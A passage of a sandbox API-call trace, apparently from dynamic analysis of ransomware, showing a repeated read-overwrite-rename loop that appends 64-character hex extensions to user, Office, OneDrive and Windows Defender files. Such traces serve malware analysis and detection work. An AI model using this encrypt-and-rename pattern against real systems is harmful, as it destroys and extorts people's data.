[0106.883] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.883] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.970] ReadFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.972] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.282] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.282] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.284] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.284] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.285] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x27fff70) returned 0x0 [0107.285] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png", lpString2=".6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png.6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png.6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425" [0107.286] GetProcessHeap () returned 0x600000 [0107.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x134) returned 0x318d538 [0107.286] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x27fff60, FileInformation=0x318d538, Length=0x134, FileInformationClass=0xa) returned 0x0 [0107.287] CloseHandle (hObject=0x31c) returned 1 [0107.290] GetProcessHeap () returned 0x600000 [0107.290] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.291] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.292] ReadFile (in: hFile=0x32c, lpBuffer=0x6a2490, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x682358 | out: lpBuffer=0x6a2490*, lpNumberOfBytesRead=0x0, lpOverlapped=0x682358) returned 1 [0107.292] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.293] WriteFile (in: hFile=0x32c, lpBuffer=0x6a2490, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x682358 | out: lpBuffer=0x6a2490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x682358) returned 0x0 [0107.293] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.293] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x682408, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x682408, ReturnLength=0x27fff70) returned 0x0 [0107.294] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp", lpString2=".08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76" [0107.294] GetProcessHeap () returned 0x600000 [0107.294] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x318c848 [0107.294] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x318c848, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0107.295] CloseHandle (hObject=0x32c) returned 1 [0107.313] GetProcessHeap () returned 0x600000 [0107.313] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0107.314] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.320] ReadFile (in: hFile=0x32c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.321] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.910] ReadFile (in: hFile=0x310, lpBuffer=0x6a2490, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x682358 | out: lpBuffer=0x6a2490*, lpNumberOfBytesRead=0x0, lpOverlapped=0x682358) returned 1 [0107.910] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0107.920] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0107.921] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin", lpString2=".C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin.C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin.C97C08C5BDA6CA20873D7EB27E5CFED4F374D9DD26C9A5A951D757782AC2C875" [0107.921] GetProcessHeap () returned 0x600000 [0107.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x318e778 [0107.921] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x318e778, Length=0x186, FileInformationClass=0xa) returned 0x0 [0107.922] CloseHandle (hObject=0x308) returned 1 [0107.925] GetProcessHeap () returned 0x600000 [0107.925] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0107.926] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0110.944] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0110.944] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log", lpString2=".1EA48A96286822A552FB4F0BB2E9DEBC68EA719A037D250E70F634362CCD9D46" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log.1EA48A96286822A552FB4F0BB2E9DEBC68EA719A037D250E70F634362CCD9D46") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log.1EA48A96286822A552FB4F0BB2E9DEBC68EA719A037D250E70F634362CCD9D46" [0110.944] GetProcessHeap () returned 0x600000 [0110.944] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13c) returned 0x318ba08 [0110.944] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x318ba08, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0110.945] CloseHandle (hObject=0x32c) returned 1 [0111.029] GetProcessHeap () returned 0x600000 [0111.029] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.030] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0111.114] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.115] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0111.143] WriteFile (in: hFile=0x310, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.144] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0111.149] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0111.150] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log", lpString2=".3A08029A2E82788D5F00470E3BB18B94791EE7B24991AD65D0AC0CA4C7963B27" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log.3A08029A2E82788D5F00470E3BB18B94791EE7B24991AD65D0AC0CA4C7963B27") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log.3A08029A2E82788D5F00470E3BB18B94791EE7B24991AD65D0AC0CA4C7963B27" [0111.150] GetProcessHeap () returned 0x600000 [0111.150] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x6f3520 [0111.150] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x27fff60, FileInformation=0x6f3520, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0111.151] CloseHandle (hObject=0x31c) returned 1 [0111.152] GetProcessHeap () returned 0x600000 [0111.152] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.153] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0111.212] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.216] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0111.289] ReadFile (in: hFile=0x308, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.290] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0111.290] WriteFile (in: hFile=0x308, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0111.291] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0111.292] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0111.293] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml", lpString2=".EB24C68320BD147F7ABEF64F57D9D30C026CAD7512037C422B777F8216131F5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml.EB24C68320BD147F7ABEF64F57D9D30C026CAD7512037C422B777F8216131F5A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml.EB24C68320BD147F7ABEF64F57D9D30C026CAD7512037C422B777F8216131F5A" [0111.293] GetProcessHeap () returned 0x600000 [0111.293] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15e) returned 0x6f46a0 [0111.293] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x6f46a0, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0111.294] CloseHandle (hObject=0x308) returned 1 [0111.297] GetProcessHeap () returned 0x600000 [0111.297] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.298] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0112.968] ReadFile (in: hFile=0x32c, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0112.968] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0112.969] WriteFile (in: hFile=0x32c, lpBuffer=0x32e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 1 [0112.970] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0112.970] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x27fff70) returned 0x0 [0112.971] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll", lpString2=".D37B760FDA2D91E9BECCD1CC5695BFB06CAF10B43B17A186B6BC617396E12D56" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll.D37B760FDA2D91E9BECCD1CC5695BFB06CAF10B43B17A186B6BC617396E12D56") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll.D37B760FDA2D91E9BECCD1CC5695BFB06CAF10B43B17A186B6BC617396E12D56" [0112.971] GetProcessHeap () returned 0x600000 [0112.971] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17a) returned 0x63a948 [0112.971] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x63a948, Length=0x17a, FileInformationClass=0xa) returned 0x0 [0112.972] CloseHandle (hObject=0x32c) returned 1 [0112.973] GetProcessHeap () returned 0x600000 [0112.973] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0112.975] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.059] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.060] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.060] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.063] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.064] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.064] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll", lpString2=".0FF261BC2EEA9117021DCEB8CF2863023404517AA5FEE44B558B111C2FA5F701" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll.0FF261BC2EEA9117021DCEB8CF2863023404517AA5FEE44B558B111C2FA5F701") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll.0FF261BC2EEA9117021DCEB8CF2863023404517AA5FEE44B558B111C2FA5F701" [0113.064] GetProcessHeap () returned 0x600000 [0113.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x174) returned 0x63ade0 [0113.064] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x63ade0, Length=0x174, FileInformationClass=0xa) returned 0x0 [0113.065] CloseHandle (hObject=0x324) returned 1 [0113.066] GetProcessHeap () returned 0x600000 [0113.066] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.067] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.075] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.075] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.076] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.076] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.077] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0113.078] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll", lpString2=".F5A47B813A033843D330225813BF22187512C53536DE2D207EC8599CCA671162" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll.F5A47B813A033843D330225813BF22187512C53536DE2D207EC8599CCA671162") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll.F5A47B813A033843D330225813BF22187512C53536DE2D207EC8599CCA671162" [0113.078] GetProcessHeap () returned 0x600000 [0113.078] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x31610a0 [0113.078] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x27fff60, FileInformation=0x31610a0, Length=0x166, FileInformationClass=0xa) returned 0x0 [0113.079] CloseHandle (hObject=0x324) returned 1 [0113.079] GetProcessHeap () returned 0x600000 [0113.079] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.080] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.083] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.083] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.083] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0113.084] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0113.090] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0113.090] lstrcatW (in: 